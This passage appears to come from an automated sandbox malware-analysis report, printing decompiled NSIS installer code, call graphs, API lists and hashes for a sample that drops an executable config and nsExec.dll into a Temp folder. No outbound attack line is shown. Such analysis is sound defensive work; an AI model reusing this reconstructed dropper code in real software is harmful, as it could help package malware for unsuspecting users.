                						E004031A9( *0x42f418 + 0x1c);
                						_push(_v24);
                						_push(_t94);
                						_push(_t82);
                						_push(0xffffffff); // executed
                						_t57 = E00402F81(); // executed
                						__eflags = _t57 - _v24;
                						if(_t57 == _v24) {
                							__eflags = _v44 & 0x00000001;
                							 *0x42f414 = _t94;
                							 *0x42f41c =  *_t94;
                							if((_v44 & 0x00000001) != 0) {
                								 *0x42f420 =  *0x42f420 + 1;
                								__eflags =  *0x42f420;
                							}
                							_t40 = _t94 + 0x44; // 0x44
                							_t59 = _t40;
                							_t85 = 8;
                							do {
                								_t59 = _t59 - 8;
                								 *_t59 =  *_t59 + _t94;
                								_t85 = _t85 - 1;
                								__eflags = _t85;
                							} while (_t85 != 0);
                							_t60 = SetFilePointer(_v16, _t82, _t82, 1); // executed
                							 *(_t94 + 0x3c) = _t60;
                							E00405AB9(0x42f440, _t94 + 4, 0x40);
                							__eflags = 0;
                							return 0;
                						}
                						goto L29;
                					}
                					E004031A9( *0x415420);
                					_t65 = E00403193( &_a4, 4);
                					__eflags = _t65;
                					if(_t65 == 0) {
                						goto L29;
                					}
                					__eflags = _v12 - _a4;
                					if(_v12 != _a4) {
                						goto L29;
                					}
                					goto L28;
                				} else {
                					do {
                						_t90 = _t93;
                						asm("sbb eax, eax");
                						_t70 = ( ~( *0x42f418) & 0x00007e00) + 0x200;
                						__eflags = _t93 - _t70;
                						if(_t93 >= _t70) {
                							_t90 = _t70;
                						}
                						_t71 = E00403193(0x421430, _t90);
                						__eflags = _t71;
                						if(_t71 == 0) {
                							E00402CE4(1);
                							L29:
                							return "Installer integrity check has failed. Common causes include\nincomplete download and damaged media. Contact the\ninstaller\'s author to obtain a new copy.\n\nMore information at:\nhttp://nsis.sf.net/NSIS_Error";
                						}
                						__eflags =  *0x42f418;
                						if( *0x42f418 != 0) {
                							__eflags = _a4 & 0x00000002;
                							if((_a4 & 0x00000002) == 0) {
                								E00402CE4(0);
                							}
                							goto L20;
                						}
                						E00405AB9( &_v44, 0x421430, 0x1c);
                						_t77 = _v44;
                						__eflags = _t77 & 0xfffffff0;
                						if((_t77 & 0xfffffff0) != 0) {
                							goto L20;
                						}
                						__eflags = _v40 - 0xdeadbeef;
                						if(_v40 != 0xdeadbeef) {
                							goto L20;
                						}
                						__eflags = _v28 - 0x74736e49;
                						if(_v28 != 0x74736e49) {
                							goto L20;
                						}
                						__eflags = _v32 - 0x74666f73;
                						if(_v32 != 0x74666f73) {
                							goto L20;
                						}
                						__eflags = _v36 - 0x6c6c754e;
                						if(_v36 != 0x6c6c754e) {
                							goto L20;
                						}
                						_a4 = _a4 | _t77;
                						_t87 =  *0x415420; // 0x36e154
                						 *0x42f4c0 =  *0x42f4c0 | _a4 & 0x00000002;
                						_t80 = _v20;
                						__eflags = _t80 - _t93;
                						 *0x42f418 = _t87;
                						if(_t80 > _t93) {
                							goto L29;
                						}
                						__eflags = _a4 & 0x00000008;
                						if((_a4 & 0x00000008) != 0) {
                							L16:
                							_v8 = _v8 + 1;
                							_t24 = _t80 - 4; // 0x40a194
                							_t93 = _t24;
                							__eflags = _t90 - _t93;
                							if(_t90 > _t93) {
                								_t90 = _t93;
                							}
                							goto L20;
                						}
                						__eflags = _a4 & 0x00000004;
                						if((_a4 & 0x00000004) != 0) {
                							break;
                						}
                						goto L16;
                						L20:
                						__eflags = _t93 -  *0x42142c; // 0x36e158
                						if(__eflags < 0) {
                							_v12 = E004063B4(_v12, 0x421430, _t90);
                						}
                						 *0x415420 =  *0x415420 + _t90;
                						_t93 = _t93 - _t90;
                						__eflags = _t93;
                					} while (_t93 > 0);
                					_t82 = 0;
                					__eflags = 0;
                					goto L24;
                				}
                			}

                APIs
                • GetTickCount.KERNEL32 ref: 00402D59
                • GetModuleFileNameA.KERNEL32(00000000,C:\Users\user\Desktop\Ptmhbplhxb.exe,00000400), ref: 00402D75
                  • Part of subcall function 00405AFE: GetFileAttributesA.KERNELBASE(00000003,00402D88,C:\Users\user\Desktop\Ptmhbplhxb.exe,80000000,00000003), ref: 00405B02
                  • Part of subcall function 00405AFE: CreateFileA.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000), ref: 00405B24
                • GetFileSize.KERNEL32(00000000,00000000,00437000,00000000,C:\Users\user\Desktop,C:\Users\user\Desktop,C:\Users\user\Desktop\Ptmhbplhxb.exe,C:\Users\user\Desktop\Ptmhbplhxb.exe,80000000,00000003), ref: 00402DC1
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.441917774.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                • Associated: 00000000.00000002.441899890.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.441946620.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.441966625.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.441966625.000000000042B000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.441966625.0000000000430000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.441966625.0000000000435000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.442087791.000000000044B000.00000002.00000001.01000000.00000003.sdmp
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_400000_Ptmhbplhxb.jbxd
                Similarity
                • API ID: File$AttributesCountCreateModuleNameSizeTick
                • String ID: "C:\Users\user\Desktop\Ptmhbplhxb.exe"$C:\Users\user~1\AppData\Local\Temp\$C:\Users\user\Desktop$C:\Users\user\Desktop\Ptmhbplhxb.exe$Error launching installer$Inst$Installer integrity check has failed. Common causes includeincomplete download and damaged media. Contact theinstaller's author to obtain a new copy.More information at:http://nsis.sf.net/NSIS_Error$Null$T6$X6$soft
                • API String ID: 4283519449-3397626543
                • Opcode ID: 7ea76b1eabee36cc462c4becf9ee5f087804ecb308710c36f18c8c35563ccf84
                • Instruction ID: b7ea9236aecaa86e611592eb70b2ed5589fa10121b1bd9207fea2451aa196312
                • Opcode Fuzzy Hash: 7ea76b1eabee36cc462c4becf9ee5f087804ecb308710c36f18c8c35563ccf84
                • Instruction Fuzzy Hash: 9D51F431A00215ABDB20AF64DE89B9F7BB8FB14358F50413BE504B72D1C7B88D858B9C
                Uniqueness

                Uniqueness Score: -1.00%

                Control-flow Graph

                • Executed
                • Not Executed
                control_flow_graph 341 402f81-402f95 342 402f97 341->342 343 402f9e-402fa7 341->343 342->343 344 402fb0-402fb5 343->344 345 402fa9 343->345 346 402fc5-402fd2 call 403193 344->346 347 402fb7-402fc0 call 4031a9 344->347 345->344 351 403181 346->351 352 402fd8-402fdc 346->352 347->346 353 403183-403184 351->353 354 402fe2-40302b GetTickCount 352->354 355 40312c-40312e 352->355 358 40318c-403190 353->358 359 403031-403039 354->359 360 403189 354->360 356 403130-403133 355->356 357 40316e-403171 355->357 356->360 363 403135 356->363 361 403173 357->361 362 403176-40317f call 403193 357->362 364 40303b 359->364 365 40303e-40304c call 403193 359->365 360->358 361->362 362->351 374 403186 362->374 368 403138-40313e 363->368 364->365 365->351 373 403052-40305b 365->373 371 403140 368->371 372 403142-403150 call 403193 368->372 371->372 372->351 378 403152-403157 call 405ba5 372->378 377 403061-403081 call 406422 373->377 374->360 383 403124-403126 377->383 384 403087-40309a GetTickCount 377->384 382 40315c-40315e 378->382 385 403160-40316a 382->385 386 403128-40312a 382->386 383->353 387 40309c-4030a4 384->387 388 4030df-4030e1 384->388 385->368 389 40316c 385->389 386->353 390 4030a6-4030aa 387->390 391 4030ac-4030dc MulDiv wsprintfA call 40508c 387->391 392 4030e3-4030e7 388->392 393 403118-40311c 388->393 389->360 390->388 390->391 391->388 396 4030e9-4030f0 call 405ba5 392->396 397 4030fe-403109 392->397 393->359 394 403122 393->394 394->360 401 4030f5-4030f7 396->401 398 40310c-403110 397->398 398->377 402 403116 398->402 401->386 403 4030f9-4030fc 401->403 402->360 403->398
                C-Code - Quality: 95%
                			E00402F81(int _a4, intOrPtr _a8, intOrPtr _a12, int _a16, signed char _a19) {
                				signed int _v8;
                				int _v12;
                				intOrPtr _v16;
                				long _v20;
                				intOrPtr _v24;
                				char _v88;
                				void* _t65;
                				void* _t69;
                				long _t70;
                				intOrPtr _t75;
                				long _t76;
                				intOrPtr _t77;
                				void* _t78;
                				int _t88;
                				intOrPtr _t92;
                				intOrPtr _t95;
                				long _t96;
                				signed int _t97;
                				int _t98;
                				int _t99;
                				intOrPtr _t100;
                				void* _t101;
                				void* _t102;
                
                				_t97 = _a16;
                				_t92 = _a12;
                				_v12 = _t97;
                				if(_t92 == 0) {
                					_v12 = 0x8000;
                				}
                				_v8 = _v8 & 0x00000000;
                				_v16 = _t92;
                				if(_t92 == 0) {
                					_v16 = 0x419428;
                				}
                				_t62 = _a4;
                				if(_a4 >= 0) {
                					E004031A9( *0x42f478 + _t62);
                				}
                				if(E00403193( &_a16, 4) == 0) {
                					L41:
                					_push(0xfffffffd);
                					goto L42;
                				} else {
                					if((_a19 & 0x00000080) == 0) {
                						if(_t92 != 0) {
                							if(_a16 < _t97) {
                								_t97 = _a16;
                							}
                							if(E00403193(_t92, _t97) != 0) {
                								_v8 = _t97;
                								L44:
                								return _v8;
                							} else {
                								goto L41;
                							}
                						}
                						if(_a16 <= _t92) {
                							goto L44;
                						}
                						_t88 = _v12;
                						while(1) {
                							_t98 = _a16;
                							if(_a16 >= _t88) {
                								_t98 = _t88;
                							}
                							if(E00403193(0x415428, _t98) == 0) {
                								goto L41;
                							}
                							_t69 = E00405BA5(_a8, 0x415428, _t98); // executed
                							if(_t69 == 0) {
                								L28:
                								_push(0xfffffffe);
                								L42:
                								_pop(_t65);
                								return _t65;
                							}
                							_v8 = _v8 + _t98;
                							_a16 = _a16 - _t98;
                							if(_a16 > 0) {
                								continue;
                							}
                							goto L44;
                						}
                						goto L41;
                					}
                					_t70 = GetTickCount();
                					 *0x40bd8c =  *0x40bd8c & 0x00000000;
                					 *0x40bd88 =  *0x40bd88 & 0x00000000;
                					_t14 =  &_a16;
                					 *_t14 = _a16 & 0x7fffffff;
                					_v20 = _t70;
                					 *0x40b870 = 8;
                					 *0x415418 = 0x40d410;
                					 *0x415414 = 0x40d410;
                					 *0x415410 = 0x415410;
                					_a4 = _a16;
                					if( *_t14 <= 0) {
                						goto L44;
                					} else {
                						goto L9;
                					}
                					while(1) {
                						L9:
                						_t99 = 0x4000;
                						if(_a16 < 0x4000) {
                							_t99 = _a16;
                						}
                						if(E00403193(0x415428, _t99) == 0) {
                							goto L41;
                						}
                						_a16 = _a16 - _t99;
                						 *0x40b860 = 0x415428;
                						 *0x40b864 = _t99;
                						while(1) {
                							_t95 = _v16;
                							 *0x40b868 = _t95;
                							 *0x40b86c = _v12;
                							_t75 = E00406422(0x40b860);
                							_v24 = _t75;
                							if(_t75 < 0) {
                								break;
                							}
                							_t100 =  *0x40b868; // 0x419517
                							_t101 = _t100 - _t95;
                							_t76 = GetTickCount();
                							_t96 = _t76;
                							if(( *0x42f4d4 & 0x00000001) != 0 && (_t76 - _v20 > 0xc8 || _a16 == 0)) {
                								wsprintfA( &_v88, "... %d%%", MulDiv(_a4 - _a16, 0x64, _a4));
                								_t102 = _t102 + 0xc;
                								E0040508C(0,  &_v88);
                								_v20 = _t96;
                							}
                							if(_t101 == 0) {
                								if(_a16 > 0) {
                									goto L9;
                								}
                								goto L44;
                							} else {
                								if(_a12 != 0) {
                									_t77 =  *0x40b868; // 0x419517
                									_v8 = _v8 + _t101;
                									_v12 = _v12 - _t101;
                									_v16 = _t77;
                									L23:
                									if(_v24 != 1) {
                										continue;
                									}
                									goto L44;
                								}
                								_t78 = E00405BA5(_a8, _v16, _t101); // executed
                								if(_t78 == 0) {
                									goto L28;
                								}
                								_v8 = _v8 + _t101;
                								goto L23;
                							}
                						}
                						_push(0xfffffffc);
                						goto L42;
                					}
                					goto L41;
                				}
                			}


                0x00402f89
                0x00402f8d
                0x00402f90
                0x00402f95
                0x00402f97
                0x00402f97
                0x00402f9e
                0x00402fa2
                0x00402fa7
                0x00402fa9
                0x00402fa9
                0x00402fb0
                0x00402fb5
                0x00402fc0
                0x00402fc0
                0x00402fd2
                0x00403181
                0x00403181
                0x00000000
                0x00402fd8
                0x00402fdc
                0x0040312e
                0x00403171
                0x00403173
                0x00403173
                0x0040317f
                0x00403186
                0x00403189
                0x00000000
                0x00000000
                0x00000000
                0x00000000
                0x0040317f
                0x00403133
                0x00000000
                0x00000000
                0x00403135
                0x00403138
                0x0040313b
                0x0040313e
                0x00403140
                0x00403140
                0x00403150
                0x00000000
                0x00000000
                0x00403157
                0x0040315e
                0x00403128
                0x00403128
                0x00403183
                0x00403183
                0x00000000
                0x00403183
                0x00403160
                0x00403163
                0x0040316a
                0x00000000
                0x00000000
                0x00000000
                0x0040316c
                0x00000000
                0x00403138
                0x00402fe8
                0x00402fea
                0x00402ff1
                0x00402ff8
                0x00402ff8
                0x00402fff
                0x00403007
                0x00403011
                0x00403016
                0x0040301e
                0x00403028
                0x0040302b
                0x00000000
                0x00000000
                0x00000000
                0x00000000
                0x00403031
                0x00403031
                0x00403031
                0x00403039
                0x0040303b
                0x0040303b
                0x0040304c
                0x00000000
                0x00000000
                0x00403052
                0x00403055
                0x0040305b
                0x00403061
                0x00403061
                0x0040306c
                0x00403072
                0x00403077
                0x0040307e
                0x00403081
                0x00000000
                0x00000000
                0x00403087
                0x0040308d
                0x0040308f
                0x00403098
                0x0040309a
                0x004030c8
                0x004030ce
                0x004030d7
                0x004030dc
                0x004030dc
                0x004030e1
                0x0040311c
                0x00000000
                0x00000000
                0x00000000
                0x004030e3
                0x004030e7
                0x004030fe
                0x00403103
                0x00403106
                0x00403109
                0x0040310c
                0x00403110
                0x00000000
                0x00000000
                0x00000000
                0x00403116
                0x004030f0
                0x004030f7
                0x00000000
                0x00000000
                0x004030f9
                0x00000000
                0x004030f9
                0x004030e1
                0x00403124
                0x00000000
                0x00403124
                0x00000000
                0x00403031

                APIs
                Strings
                • (TA, xrefs: 0040303E
                • (TA, xrefs: 00403142
                • <?xml version="1.0" encoding="utf-8"?><configuration> <startup> <supportedRuntime version="v2.0.50727"/><supportedRuntime version="v4.0" sku=".NETFramework,Version=v4.0,Profile=Client"/></startup></configuration>, xrefs: 00403002
                • ... %d%%, xrefs: 004030C2
                Memory Dump Source
                • Source File: 00000000.00000002.441917774.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                • Associated: 00000000.00000002.441899890.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.441946620.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.441966625.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.441966625.000000000042B000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.441966625.0000000000430000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.441966625.0000000000435000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.442087791.000000000044B000.00000002.00000001.01000000.00000003.sdmp
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_400000_Ptmhbplhxb.jbxd
                Similarity
                • API ID: CountTick$wsprintf
                • String ID: (TA$(TA$... %d%%$<?xml version="1.0" encoding="utf-8"?><configuration> <startup> <supportedRuntime version="v2.0.50727"/><supportedRuntime version="v4.0" sku=".NETFramework,Version=v4.0,Profile=Client"/></startup></configuration>
                • API String ID: 551687249-1307617928
                • Opcode ID: 219cae2b91f3bf38bad7132d0a8990421fc9c3883ef73589e1e6bd7f052db87f
                • Instruction ID: f4b3021151c61e236b0315b1fcc5adb3b60be84788d5942dbd3e7f3cce39453d
                • Opcode Fuzzy Hash: 219cae2b91f3bf38bad7132d0a8990421fc9c3883ef73589e1e6bd7f052db87f
                • Instruction Fuzzy Hash: 86517D71900219EBDB10DF65DA4469E7BB8EF48356F14853BE800BB2D0C7789E41CBAD
                Uniqueness

                Uniqueness Score: -1.00%

                Control-flow Graph

                • Executed
                • Not Executed
                control_flow_graph 404 401759-40177c call 402ac1 call 40596a 409 401786-401798 call 405f65 call 4058fd lstrcatA 404->409 410 40177e-401784 call 405f65 404->410 415 40179d-4017a3 call 4061cf 409->415 410->415 420 4017a8-4017ac 415->420 421 4017ae-4017b8 call 406268 420->421 422 4017df-4017e2 420->422 430 4017ca-4017dc 421->430 431 4017ba-4017c8 CompareFileTime 421->431 423 4017e4-4017e5 call 405ad9 422->423 424 4017ea-401806 call 405afe 422->424 423->424 432 401808-40180b 424->432 433 40187e-4018a7 call 40508c call 402f81 424->433 430->422 431->430 434 401860-40186a call 40508c 432->434 435 40180d-40184f call 405f65 * 2 call 405f87 call 405f65 call 405681 432->435 447 4018a9-4018ad 433->447 448 4018af-4018bb SetFileTime 433->448 445 401873-401879 434->445 435->420 467 401855-401856 435->467 450 40295a 445->450 447->448 449 4018c1-4018cc FindCloseChangeNotification 447->449 448->449 452 402951-402954 449->452 453 4018d2-4018d5 449->453 454 40295c-402960 450->454 452->450 456 4018d7-4018e8 call 405f87 lstrcatA 453->456 457 4018ea-4018ed call 405f87 453->457 463 4018f2-4022e6 call 405681 456->463 457->463 463->452 463->454 467->445 469 401858-401859 467->469 469->434
                C-Code - Quality: 75%
                			E00401759(FILETIME* __ebx, void* __eflags) {
                				void* _t33;
                				void* _t41;
                				void* _t43;
                				FILETIME* _t49;
                				FILETIME* _t62;
                				void* _t64;
                				signed int _t70;
                				FILETIME* _t71;
                				FILETIME* _t75;
                				signed int _t77;
                				void* _t80;
                				CHAR* _t82;
                				CHAR* _t83;
                				void* _t85;
                
                				_t75 = __ebx;
                				_t82 = E00402AC1(0x31);
                				 *(_t85 - 8) = _t82;
                				 *(_t85 + 8) =  *(_t85 - 0x28) & 0x00000007;
                				_t33 = E0040596A(_t82);
                				_push(_t82);
                				_t83 = "C:\\Users\\FRONTD~1\\AppData\\Local\\Temp\\nsq9535.tmp\\pdzaicbnewkzt.exe.config";
                				if(_t33 == 0) {
                					lstrcatA(E004058FD(E00405F65(_t83, "C:\\Users\\FRONTD~1\\AppData\\Local\\Temp\\nsq9535.tmp")), ??);
                				} else {
                					E00405F65();
                				}
                				E004061CF(_t83);
                				while(1) {
                					__eflags =  *(_t85 + 8) - 3;
                					if( *(_t85 + 8) >= 3) {
                						_t64 = E00406268(_t83);
                						_t77 = 0;
                						__eflags = _t64 - _t75;
                						if(_t64 != _t75) {
                							_t71 = _t64 + 0x14;
                							__eflags = _t71;
                							_t77 = CompareFileTime(_t71, _t85 - 0x1c);
                						}
                						asm("sbb eax, eax");
                						_t70 =  ~(( *(_t85 + 8) + 0xfffffffd | 0x80000000) & _t77) + 1;
                						__eflags = _t70;
                						 *(_t85 + 8) = _t70;
                					}
                					__eflags =  *(_t85 + 8) - _t75;
                					if( *(_t85 + 8) == _t75) {
                						E00405AD9(_t83);
                					}
                					__eflags =  *(_t85 + 8) - 1;
                					_t41 = E00405AFE(_t83, 0x40000000, (0 |  *(_t85 + 8) != 0x00000001) + 1);
                					__eflags = _t41 - 0xffffffff;
                					 *(_t85 - 0xc) = _t41;
                					if(_t41 != 0xffffffff) {
                						break;
                					}
                					__eflags =  *(_t85 + 8) - _t75;
                					if( *(_t85 + 8) != _t75) {
                						E0040508C(0xffffffe2,  *(_t85 - 8));
                						__eflags =  *(_t85 + 8) - 2;
                						if(__eflags == 0) {
                							 *((intOrPtr*)(_t85 - 4)) = 1;
                						}
                						L31:
                						 *0x42f4a8 =  *0x42f4a8 +  *((intOrPtr*)(_t85 - 4));
                						__eflags =  *0x42f4a8;
                						goto L32;
                					} else {
                						E00405F65(0x40ac18, 0x430000);
                						E00405F65(0x430000, _t83);
                						E00405F87(_t75, 0x40ac18, _t83, "C:\Users\FRONTD~1\AppData\Local\Temp\nsq9535.tmp\nsExec.dll",  *((intOrPtr*)(_t85 - 0x14)));
                						E00405F65(0x430000, 0x40ac18);
                						_t62 = E00405681("C:\Users\FRONTD~1\AppData\Local\Temp\nsq9535.tmp\nsExec.dll",  *(_t85 - 0x28) >> 3) - 4;
                						__eflags = _t62;
                						if(_t62 == 0) {
                							continue;
                						} else {
                							__eflags = _t62 == 1;
                							if(_t62 == 1) {
                								 *0x42f4a8 =  &( *0x42f4a8->dwLowDateTime);
                								L32:
                								_t49 = 0;
                								__eflags = 0;
                							} else {
                								_push(_t83);
                								_push(0xfffffffa);
                								E0040508C();
                								L29:
                								_t49 = 0x7fffffff;
                							}
                						}
                					}
                					L33:
                					return _t49;
                				}
                				E0040508C(0xffffffea,  *(_t85 - 8));
                				 *0x42f4d4 =  *0x42f4d4 + 1;
                				_t43 = E00402F81( *((intOrPtr*)(_t85 - 0x20)),  *(_t85 - 0xc), _t75, _t75); // executed
                				 *0x42f4d4 =  *0x42f4d4 - 1;
                				__eflags =  *(_t85 - 0x1c) - 0xffffffff;
                				_t80 = _t43;
                				if( *(_t85 - 0x1c) != 0xffffffff) {
                					L22:
                					SetFileTime( *(_t85 - 0xc), _t85 - 0x1c, _t75, _t85 - 0x1c); // executed
                				} else {
                					__eflags =  *((intOrPtr*)(_t85 - 0x18)) - 0xffffffff;
                					if( *((intOrPtr*)(_t85 - 0x18)) != 0xffffffff) {
                						goto L22;
                					}
                				}
                				FindCloseChangeNotification( *(_t85 - 0xc)); // executed
                				__eflags = _t80 - _t75;
                				if(_t80 >= _t75) {
                					goto L31;
                				} else {
                					__eflags = _t80 - 0xfffffffe;
                					if(_t80 != 0xfffffffe) {
                						E00405F87(_t75, _t80, _t83, _t83, 0xffffffee);
                					} else {
                						E00405F87(_t75, _t80, _t83, _t83, 0xffffffe9);
                						lstrcatA(_t83,  *(_t85 - 8));
                					}
                					_push(0x200010);
                					_push(_t83);
                					E00405681();
                					goto L29;
                				}
                				goto L33;
                			}

                0x00401759
                0x00401760
                0x00401769
                0x0040176c
                0x0040176f
                0x00401774
                0x00401775
                0x0040177c
                0x00401798
                0x0040177e
                0x0040177f
                0x0040177f
                0x0040179e
                0x004017a8
                0x004017a8
                0x004017ac
                0x004017af
                0x004017b4
                0x004017b6
                0x004017b8
                0x004017bd
                0x004017bd
                0x004017c8
                0x004017c8
                0x004017d9
                0x004017db
                0x004017db
                0x004017dc
                0x004017dc
                0x004017df
                0x004017e2
                0x004017e5
                0x004017e5
                0x004017ec
                0x004017fb
                0x00401800
                0x00401803
                0x00401806
                0x00000000
                0x00000000
                0x00401808
                0x0040180b
                0x00401865
                0x0040186a
                0x004015b0
                0x00402716
                0x00402716
                0x00402951
                0x00402954
                0x00402954
                0x00000000
                0x0040180d
                0x00401813
                0x0040181e
                0x0040182b
                0x00401836
                0x0040184c
                0x0040184c
                0x0040184f
                0x00000000
                0x00401855
                0x00401855
                0x00401856
                0x00401873
                0x0040295a
                0x0040295a
                0x0040295a
                0x00401858
                0x00401858
                0x00401859
                0x00401492
                0x004022e1
                0x004022e1
                0x004022e1
                0x00401856
                0x0040184f
                0x0040295c
                0x00402960
                0x00402960
                0x00401883
                0x00401888
                0x00401896
                0x0040189b
                0x004018a1
                0x004018a5
                0x004018a7
                0x004018af
                0x004018bb
                0x004018a9
                0x004018a9
                0x004018ad
                0x00000000
                0x00000000
                0x004018ad
                0x004018c4
                0x004018ca
                0x004018cc
                0x00000000
                0x004018d2
                0x004018d2
                0x004018d5
                0x004018ed
                0x004018d7
                0x004018da
                0x004018e3
                0x004018e3
                0x004018f2
                0x004018f7
                0x004022dc
                0x00000000
                0x004022dc
                0x00000000

                APIs
                • lstrcatA.KERNEL32(00000000,00000000,C:\Users\user~1\AppData\Local\Temp\nsq9535.tmp\pdzaicbnewkzt.exe.config,C:\Users\user~1\AppData\Local\Temp\nsq9535.tmp,00000000,00000000,00000031), ref: 00401798
                • CompareFileTime.KERNEL32(-00000014,?,C:\Users\user~1\AppData\Local\Temp\nsq9535.tmp\pdzaicbnewkzt.exe.config,C:\Users\user~1\AppData\Local\Temp\nsq9535.tmp\pdzaicbnewkzt.exe.config,00000000,00000000,C:\Users\user~1\AppData\Local\Temp\nsq9535.tmp\pdzaicbnewkzt.exe.config,C:\Users\user~1\AppData\Local\Temp\nsq9535.tmp,00000000,00000000,00000031), ref: 004017C2
                  • Part of subcall function 00405F65: lstrcpynA.KERNEL32(?,?,00000400,004032C3,Setup Setup,NSIS Error,?,00000006,00000008,0000000A), ref: 00405F72
                  • Part of subcall function 0040508C: lstrlenA.KERNEL32(0042A050,00000000,00419517,772EEA30,?,?,?,?,?,?,?,?,?,004030DC,00000000,?), ref: 004050C5
                  • Part of subcall function 0040508C: lstrlenA.KERNEL32(004030DC,0042A050,00000000,00419517,772EEA30,?,?,?,?,?,?,?,?,?,004030DC,00000000), ref: 004050D5
                  • Part of subcall function 0040508C: lstrcatA.KERNEL32(0042A050,004030DC,004030DC,0042A050,00000000,00419517,772EEA30), ref: 004050E8
                  • Part of subcall function 0040508C: SetWindowTextA.USER32(0042A050,0042A050), ref: 004050FA
                  • Part of subcall function 0040508C: SendMessageA.USER32(?,00001004,00000000,00000000), ref: 00405120
                  • Part of subcall function 0040508C: SendMessageA.USER32(?,00001007,00000000,00000001), ref: 0040513A
                  • Part of subcall function 0040508C: SendMessageA.USER32(?,00001013,?,00000000), ref: 00405148
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.441917774.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                • Associated: 00000000.00000002.441899890.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.441946620.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.441966625.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.441966625.000000000042B000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.441966625.0000000000430000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.441966625.0000000000435000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.442087791.000000000044B000.00000002.00000001.01000000.00000003.sdmp
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_400000_Ptmhbplhxb.jbxd
                Similarity
                • API ID: MessageSend$lstrcatlstrlen$CompareFileTextTimeWindowlstrcpyn
                • String ID: C:\Users\user~1\AppData\Local\Temp\nsq9535.tmp$C:\Users\user~1\AppData\Local\Temp\nsq9535.tmp\nsExec.dll$C:\Users\user~1\AppData\Local\Temp\nsq9535.tmp\pdzaicbnewkzt.exe.config
                • API String ID: 1941528284-1111951767
                • Opcode ID: 31c0dc35165cd9c2c81e055de88f8ba7219800017b80078377aa7409dfa41ea4
                • Instruction ID: 024705dcfdf044f05b4b82656432081f20986447a00b4521f0a60d415ab43704
                • Opcode Fuzzy Hash: 31c0dc35165cd9c2c81e055de88f8ba7219800017b80078377aa7409dfa41ea4
                • Instruction Fuzzy Hash: 4841B431A04515BECB107BB58C45EAF3679EF05369F60833BF421F20E1D67C89428A6D
                Uniqueness

                Uniqueness Score: -1.00%

                Control-flow Graph

                • Executed
                • Not Executed
                control_flow_graph 471 405552-40559d CreateDirectoryA 472 4055a3-4055b0 GetLastError 471->472 473 40559f-4055a1 471->473 474 4055b2-4055c6 SetFileSecurityA 472->474 475 4055ca-4055cc 472->475 473->475 474->473 476 4055c8 GetLastError 474->476 476->475
                C-Code - Quality: 100%
                			E00405552(CHAR* _a4) {
                				struct _SECURITY_ATTRIBUTES _v16;
                				struct _SECURITY_DESCRIPTOR _v36;
                				int _t22;
                				long _t23;
                
                				_v36.Sbz1 = _v36.Sbz1 & 0x00000000;
                				_v36.Owner = 0x408374;
                				_v36.Group = 0x408374;
                				_v36.Sacl = _v36.Sacl & 0x00000000;
                				_v16.bInheritHandle = _v16.bInheritHandle & 0x00000000;
                				_v16.lpSecurityDescriptor =  &_v36;
                				_v36.Revision = 1;
                				_v36.Control = 4;
                				_v36.Dacl = 0x408364;
                				_v16.nLength = 0xc;
                				_t22 = CreateDirectoryA(_a4,  &_v16); // executed
                				if(_t22 != 0) {
                					L1:
                					return 0;
                				}
                				_t23 = GetLastError();
                				if(_t23 == 0xb7) {
                					if(SetFileSecurityA(_a4, 0x80000007,  &_v36) != 0) {
                						goto L1;
                					}
                					return GetLastError();
                				}
                				return _t23;
                			}

                0x0040555d
                0x00405561
                0x00405564
                0x0040556a
                0x0040556e
                0x00405572
                0x0040557a
                0x00405581
                0x00405587
                0x0040558e
                0x00405595
                0x0040559d
                0x0040559f
                0x00000000
                0x0040559f
                0x004055a9
                0x004055b0
                0x004055c6
                0x00000000
                0x00000000
                0x00000000
                0x004055c8
                0x004055cc

                APIs
                • CreateDirectoryA.KERNELBASE(?,?,C:\Users\user~1\AppData\Local\Temp\), ref: 00405595
                • GetLastError.KERNEL32 ref: 004055A9
                • SetFileSecurityA.ADVAPI32(?,80000007,00000001), ref: 004055BE
                • GetLastError.KERNEL32 ref: 004055C8
                Strings
                • C:\Users\user\Desktop, xrefs: 00405552
                • C:\Users\user~1\AppData\Local\Temp\, xrefs: 00405578
                Memory Dump Source
                • Source File: 00000000.00000002.441917774.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                • Associated: 00000000.00000002.441899890.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.441946620.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.441966625.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.441966625.000000000042B000.00000004.00000001.01000000.00000003.sdmp
